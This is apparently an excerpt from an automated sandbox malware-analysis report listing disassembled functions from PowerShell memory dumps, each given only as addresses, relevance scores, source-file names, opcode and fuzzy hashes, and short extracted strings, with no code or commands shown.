                                                                                                    • Instruction ID: 198ea6671b0826fdabec8232b62d004c6dcc9107230a24b7cabc70a89884c0b4
                                                                                                    • Opcode Fuzzy Hash: 7c48d855823181bbcf74811de135f819af75d6440f54cca6f099096318f26695
                                                                                                    • Instruction Fuzzy Hash: F6F14470A18A4D8FDF94DF5CC4A5AAD7BE2FFA9310F14416AD409E7295CA38E841CBC1
                                                                                                    Function 00007FFD3476BAB6 Relevance: .3, Instructions: 333COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 041e1d4b3f538de9d21378ef802539dffe7e54e687dbe1a9a9c85a5ae93fd468
                                                                                                    • Instruction ID: b7adeab5940b66b726e391d15b19b2bd9d8bdc86be76b707a9d1be17bc53738c
                                                                                                    • Opcode Fuzzy Hash: 041e1d4b3f538de9d21378ef802539dffe7e54e687dbe1a9a9c85a5ae93fd468
                                                                                                    • Instruction Fuzzy Hash: 36B19770608A4D8FDB69DF28C8557E93BE1FF56310F04426EE84DC7292DE78A945CB82
                                                                                                    Function 00007FFD3476B5B4 Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 23939805478daee73bc9fcd2fe38dee662a4d901a40e7dae32b0082dcc08ca41
                                                                                                    • Instruction ID: 3daf7c5a12e0c83166a43a560fd1cb474dae725ecfae9782723377ec8dcf3463
                                                                                                    • Opcode Fuzzy Hash: 23939805478daee73bc9fcd2fe38dee662a4d901a40e7dae32b0082dcc08ca41
                                                                                                    • Instruction Fuzzy Hash: BD311570A1866ECEFBB89E14CC6ABF83296FF07325F400139D50EC6092DA3C3985CA51
                                                                                                    Function 00007FFD348347BA Relevance: .1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7529edf2a8c9a89730c9c90eebcc55f76c0eb9878554d3b266d9e763e238568c
                                                                                                    • Instruction ID: e133f840f6ed520c4b1832083067b1c277c94cd8ff4f12f475aaaf3aa52c9149
                                                                                                    • Opcode Fuzzy Hash: 7529edf2a8c9a89730c9c90eebcc55f76c0eb9878554d3b266d9e763e238568c
                                                                                                    • Instruction Fuzzy Hash: 6021D426F1DE8E0FE3A5A76C14B517866C2EF96760B5800BAD20DC32E3DD2DEC45A245
                                                                                                    Function 00007FFD34835751 Relevance: .1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a1160884f5a2197d56b7f2010540d39b9087bb40036b2bf5e125f325126ff5e1
                                                                                                    • Instruction ID: a0b87a7154ee069e5f1d3ffed75e310f149bf02181ea7b6aae93934bbcd20864
                                                                                                    • Opcode Fuzzy Hash: a1160884f5a2197d56b7f2010540d39b9087bb40036b2bf5e125f325126ff5e1
                                                                                                    • Instruction Fuzzy Hash: 5C012622F2FE9A4FE3E6A79C28751B8A6C1FF55710B4401B6E50CD32D3DE0C6C045289
                                                                                                    Function 00007FFD34763945 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                    • Instruction ID: ccb47aa8fbe24eb607960a5a01b2fbd112d6e83e82c84202e24b2311ecda4c2e
                                                                                                    • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                    • Instruction Fuzzy Hash: 5701677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3651D636E881CB45
                                                                                                    Function 00007FFD3483788A Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0d56de671ff9b73746ae37c3c9a6b899c34d1e3b3921bec04d1a4aa796afce06
                                                                                                    • Instruction ID: 19ef4efb87462d9d0fe2f70a1bc9aaf88c2cde57895cd170d3a16aa2f51f8798
                                                                                                    • Opcode Fuzzy Hash: 0d56de671ff9b73746ae37c3c9a6b899c34d1e3b3921bec04d1a4aa796afce06
                                                                                                    • Instruction Fuzzy Hash: 0BF0E527B0CD0D0DE395926C54651F973C2EFC5131B554177C25EC3192ED15D41A9204
                                                                                                    Function 00007FFD34837C49 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f0c015e9407979c99fc8fc4c20df79d845ef4d325baa5a8a67b9f5009f3948f2
                                                                                                    • Instruction ID: c2582c203cbac9c90d1398721ec21204b0be45cf04bafeeee9372ca080d7264e
                                                                                                    • Opcode Fuzzy Hash: f0c015e9407979c99fc8fc4c20df79d845ef4d325baa5a8a67b9f5009f3948f2
                                                                                                    • Instruction Fuzzy Hash: 36E0DF37B0DA0A0AFB59665C28B20F8B3D2EF81230748183FD24EC2583EC1AA8264644
                                                                                                    Function 00007FFD3483191A Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2266394836.00007FFD34830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34830000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e66b5b8c5212775567eacfadd40969d16d8e38bb8fffd6381d094b88c1f72857
                                                                                                    • Instruction ID: 50f2a855372c127c22c5fa6460b1b654b27c2f76b3ad6263e59e58a1abd08a88
                                                                                                    • Opcode Fuzzy Hash: e66b5b8c5212775567eacfadd40969d16d8e38bb8fffd6381d094b88c1f72857
                                                                                                    • Instruction Fuzzy Hash: 7BE02217B0EA8A4FEB81B72C04B806827D0FF9A26032400BBE04CC72A7CD2C4C0D4310

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD34766B68 Relevance: .4, Instructions: 444COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ab49358d1997792a8a842c1eb65653756ec62b95a7b7bca0663eee2365b0fe2f
                                                                                                    • Instruction ID: bb0d6323aec101ccfe0a1df03ce9c2513aa92e3928ee0bc8dc344accc2706432
                                                                                                    • Opcode Fuzzy Hash: ab49358d1997792a8a842c1eb65653756ec62b95a7b7bca0663eee2365b0fe2f
                                                                                                    • Instruction Fuzzy Hash: 07E1E6B1B08A4A8FDBA1DF5CC4A5AED7BE2FF56320F440176D548D71A2CA2CB845D780
                                                                                                    Function 00007FFD34766BAA Relevance: .3, Instructions: 298COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ebdf526a7885905accb3349811169ef2bc3e47ea175fba9c8e5ee9ceabf2f57d
                                                                                                    • Instruction ID: ddfb064f1915d985f939cc23a6f1f077c671814aa12fb48d9880d230bcbba9d1
                                                                                                    • Opcode Fuzzy Hash: ebdf526a7885905accb3349811169ef2bc3e47ea175fba9c8e5ee9ceabf2f57d
                                                                                                    • Instruction Fuzzy Hash: 7EA116B1A0CA4A9FDBA1DB18C4A59E97BE2FF56320F444176C548D71A2CA3CB846D780
                                                                                                    Function 00007FFD347670F3 Relevance: .2, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3218b6243acf6ec02d89d41f364e4bbe05bb22fe8aa4f84d20f2d3ead427f3f8
                                                                                                    • Instruction ID: 198a2ecbddf147fcdc5743ac6b1707ff972c4f7c5196641a92a0f70308da34d8
                                                                                                    • Opcode Fuzzy Hash: 3218b6243acf6ec02d89d41f364e4bbe05bb22fe8aa4f84d20f2d3ead427f3f8
                                                                                                    • Instruction Fuzzy Hash: 2D518687B4E7D29BE656422C18F70D67FD5DF932B570900B7C694CE0939D0C384BAA92
                                                                                                    Function 00007FFD347626DD Relevance: .2, Instructions: 183COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dec5b59dea1e61cea268d52f5f1dce70f459032886a6f29c9fb37192752ceeca
                                                                                                    • Instruction ID: 2e068d2104b216c121b394cce39744c4f7287a7e88beb14d2335d7f65a045433
                                                                                                    • Opcode Fuzzy Hash: dec5b59dea1e61cea268d52f5f1dce70f459032886a6f29c9fb37192752ceeca
                                                                                                    • Instruction Fuzzy Hash: 57515197A0E7D25FE7A356381CB54993FA59F5323470A01B7C6C8CF0D7DD0C680AA292
                                                                                                    Function 00007FFD34764D55 Relevance: .2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 67b520b43321b74965dbdaad83ee5a6d1ec6c05b7373397884edf74815eacafd
                                                                                                    • Instruction ID: 635ad5fb7cd3eb8170d878c4117cb3598265387907e175117cccaf61b4fd0d73
                                                                                                    • Opcode Fuzzy Hash: 67b520b43321b74965dbdaad83ee5a6d1ec6c05b7373397884edf74815eacafd
                                                                                                    • Instruction Fuzzy Hash: 23518697F0D7D3AAE767423818B61E53F969F53234B0901B6C784CB0D39E0C7816A2D5
                                                                                                    Function 00007FFD347669CD Relevance: .2, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2265937770.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_7ffd34760000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47eb53cd11d17d09414311a4f8260129af36a4013ef6e5d9e0fe085833abeeb6
                                                                                                    • Instruction ID: d46e979529226b50babbe420b541ec116e41de8e428579f4153b20357785fe22
                                                                                                    • Opcode Fuzzy Hash: 47eb53cd11d17d09414311a4f8260129af36a4013ef6e5d9e0fe085833abeeb6
                                                                                                    • Instruction Fuzzy Hash: CD4198C7B0E6C29AE632462D58F60D63FD5DF9363178940B7C784CA0A39C0D785AA2A1

                                                                                                    Executed Functions

                                                                                                    Function 045DEDF0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \VFj
                                                                                                    • API String ID: 0-3286916545
                                                                                                    • Opcode ID: a5efbe77f000bb0cf9f7e4309ff69da927ca825866b87a0acb5e6563c498c248
                                                                                                    • Instruction ID: 9f1c7e2a65a8928824add7d75c8251b82312eeb08059172c82ec053f21fc69fc
                                                                                                    • Opcode Fuzzy Hash: a5efbe77f000bb0cf9f7e4309ff69da927ca825866b87a0acb5e6563c498c248
                                                                                                    • Instruction Fuzzy Hash: A3B16E71E00609CFDF24CFADD88579EBBF2BF88704F148529E416AB254EB74A841DB81
                                                                                                    Function 045DF6C0 Relevance: .3, Instructions: 266COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7b97b5b78b64ba44aa1316035c93b4a5d1ec05745bb4aec1f307915b127466ad
                                                                                                    • Instruction ID: cc2544e9e3f6d5853e0c2b610d181972c3718826d2f5cb1bf79c800fb5a544d8
                                                                                                    • Opcode Fuzzy Hash: 7b97b5b78b64ba44aa1316035c93b4a5d1ec05745bb4aec1f307915b127466ad
                                                                                                    • Instruction Fuzzy Hash: 8DB14D72E00209DFDB24CFA9D8817DDBBF2BF88718F148529D416EB254EB74A845DB81
                                                                                                    Function 073C53B8 Relevance: 12.2, Strings: 9, Instructions: 971COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$(fgl$(fgl$(fgl$(fgl$tLYk
                                                                                                    • API String ID: 0-1671616529
                                                                                                    • Opcode ID: 68ecce3212799583a8b8ef7c75720d0f35ae1d27cbb02cd34e73bf1eb9fec6c5
                                                                                                    • Instruction ID: fdb497d9cfdac4d5b943cbf75bcdb94f367355f798b53c934df048deb6307711
                                                                                                    • Opcode Fuzzy Hash: 68ecce3212799583a8b8ef7c75720d0f35ae1d27cbb02cd34e73bf1eb9fec6c5
                                                                                                    • Instruction Fuzzy Hash: 16927BB4B10215DFE724DB58C954B9ABBB2AF89304F24C0A9D9099F791CF72EC818F51
                                                                                                    Function 073C539B Relevance: 8.3, Strings: 6, Instructions: 773COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$(fgl$tLYk
                                                                                                    • API String ID: 0-1611006412
                                                                                                    • Opcode ID: 12e5dacec15b42b9a21b1162959c4e133f6921dcce81583688a02a27d77da1e4
                                                                                                    • Instruction ID: b11f6e71af9071f43e4c526f0593a571c3667b2aabf8b0aa13f0840b525ad07e
                                                                                                    • Opcode Fuzzy Hash: 12e5dacec15b42b9a21b1162959c4e133f6921dcce81583688a02a27d77da1e4
                                                                                                    • Instruction Fuzzy Hash: 1E725AB4B10215DFE724CB18C954B99BBB2BF89704F64C0A9D9099B392CB72ED818F51
                                                                                                    Function 073C7223 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$x.Xk$x.Xk$-Xk
                                                                                                    • API String ID: 0-4127336955
                                                                                                    • Opcode ID: 5a93d078a51ff55c2e0124f4ca6e0164acfb7b19bc2914592cbe301807a991ef
                                                                                                    • Instruction ID: 5ba61db546adb5eeb07ad0d38106661a75edc7b14455686d885960a149bb552e
                                                                                                    • Opcode Fuzzy Hash: 5a93d078a51ff55c2e0124f4ca6e0164acfb7b19bc2914592cbe301807a991ef
                                                                                                    • Instruction Fuzzy Hash: 7EF183B0A00215DFE724DB68C955FAE7BB2AFC4700F1084A9DA09AF795CB72DC418F95
                                                                                                    Function 073C4FB0 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$x.Xk
                                                                                                    • API String ID: 0-1173585876
                                                                                                    • Opcode ID: b1371fe25d3b4cf9ebe29ab7b08ee9338dbe9ee7dc6676a9ef4088895a164dc8
                                                                                                    • Instruction ID: 4fe37313c1c4994c7058d12edb1c4df43fbe6cfc2e2268340e11eab0ef8a9744
                                                                                                    • Opcode Fuzzy Hash: b1371fe25d3b4cf9ebe29ab7b08ee9338dbe9ee7dc6676a9ef4088895a164dc8
                                                                                                    • Instruction Fuzzy Hash: 9DB185B0B10205DFE724DBA8C455BAABBE2AFC8704F248469D505AF791CB72EC41CF65
                                                                                                    Function 073C6BA8 Relevance: 5.8, Strings: 4, Instructions: 814COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: x.Xk$x.Xk$-Xk$-Xk
                                                                                                    • API String ID: 0-3777945611
                                                                                                    • Opcode ID: 60d0b5bfea6da386040001d2a23f9348a2500417f1a14f65a3b73708f5a13797
                                                                                                    • Instruction ID: 24436861463bf647ade1d4e96c1d712ad369f20b892c3233e582e5b43309378f
                                                                                                    • Opcode Fuzzy Hash: 60d0b5bfea6da386040001d2a23f9348a2500417f1a14f65a3b73708f5a13797
                                                                                                    • Instruction Fuzzy Hash: 62727FB0A10215DFE724DBA8C855B9EBBB2AF84704F10C4A9D9096F795CB72DC41CFA1
                                                                                                    Function 045DB700 Relevance: 5.5, Strings: 4, Instructions: 456COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: h]Fj$h]Fj$h]Fj$IFj
                                                                                                    • API String ID: 0-765126014
                                                                                                    • Opcode ID: 39cfe022e2e16f8c5671aa7416e7acb57d72499ab57f49a98ce7627efb4ea97b
                                                                                                    • Instruction ID: 883751dc20cf2f85692904dfa4cfdcb1dd97544539ee981e2a91b9e9263531fc
                                                                                                    • Opcode Fuzzy Hash: 39cfe022e2e16f8c5671aa7416e7acb57d72499ab57f49a98ce7627efb4ea97b
                                                                                                    • Instruction Fuzzy Hash: 67125030B011188FDB25DF68D854BAEB7B2BF89705F1144A9D80AAB365CF35AD81DF81
                                                                                                    Function 073C7813 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$x.Xk$-Xk
                                                                                                    • API String ID: 0-3871031438
                                                                                                    • Opcode ID: 018f51b2713e91c62e76c4a430b2e3e1eaa8d40ec69485be61003a98085293b4
                                                                                                    • Instruction ID: 853d416060880343990b45defe0afdcb1f5c6d0a6f195e1ce734ec07a21a79b1
                                                                                                    • Opcode Fuzzy Hash: 018f51b2713e91c62e76c4a430b2e3e1eaa8d40ec69485be61003a98085293b4
                                                                                                    • Instruction Fuzzy Hash: 5902A2B4A10205DFE714DB58C854FAABBB2AF88714F14C499E9096F395CB72EC42CF91
                                                                                                    Function 073C4F91 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$x.Xk
                                                                                                    • API String ID: 0-3753052516
                                                                                                    • Opcode ID: 20ab303ebf57edabf25438ecd5b2546682e962ca57edf2a10ac0f03dbed26d32
                                                                                                    • Instruction ID: 924498348a462d2dbe1c4b8299f3451e5bd45783299e7ccc117097c04ad1e2eb
                                                                                                    • Opcode Fuzzy Hash: 20ab303ebf57edabf25438ecd5b2546682e962ca57edf2a10ac0f03dbed26d32
                                                                                                    • Instruction Fuzzy Hash: F6A193F0A10205DFEB24DB64C454BAABBF2AF89710F248069E505AF791CB72EC41CF65
                                                                                                    Function 073C2BD0 Relevance: 3.1, Strings: 2, Instructions: 604COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84el$84el
                                                                                                    • API String ID: 0-2867667415
                                                                                                    • Opcode ID: 79ea30eb95161754b6ce46f005581c4e42bb89861727d62d0e66bbd1a37d5734
                                                                                                    • Instruction ID: a159daa369c2918008c8189d2ba6d74320d489af7bedfcdf277b299514dd90fa
                                                                                                    • Opcode Fuzzy Hash: 79ea30eb95161754b6ce46f005581c4e42bb89861727d62d0e66bbd1a37d5734
                                                                                                    • Instruction Fuzzy Hash: 6E1218B1704346DFEB25DB79C81466ABBB5BF86210F14C0AFD449CB296DA31CC45CBA2
                                                                                                    Function 045DF42C Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \VFj$\VFj
                                                                                                    • API String ID: 0-3111992299
                                                                                                    • Opcode ID: f7872f67d5d06697e0d355452d9eec923afa0675841591c044d52739e0c2e5fa
                                                                                                    • Instruction ID: 920a9e2afc8b4d1240c2dc210226e35d465ae0d0dfc1cd5e9b2d518371d3fd87
                                                                                                    • Opcode Fuzzy Hash: f7872f67d5d06697e0d355452d9eec923afa0675841591c044d52739e0c2e5fa
                                                                                                    • Instruction Fuzzy Hash: 26714972E002499FDF20CFADD88179EBBF2BF88714F148129E416A7254EB74A841DF95
                                                                                                    Function 045DF438 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \VFj$\VFj
                                                                                                    • API String ID: 0-3111992299
                                                                                                    • Opcode ID: 5d38b2a9e43d7b0a8a6d50a318c048a85190b51927b7adcb02cd9d64b942960d
                                                                                                    • Instruction ID: acb6b4675eb1d23d35e9aa7db0b9bcf9ab9181bbb598e2d7c1d43b434a0727c6
                                                                                                    • Opcode Fuzzy Hash: 5d38b2a9e43d7b0a8a6d50a318c048a85190b51927b7adcb02cd9d64b942960d
                                                                                                    • Instruction Fuzzy Hash: 2B714971E00249DFDF20CFA9D88179EBBF2BF88714F148129E416AB254EB74A841DF95
                                                                                                    Function 045DC3B8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2380259705.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_45d0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: h]Fj$IFj
                                                                                                    • API String ID: 0-4105791047
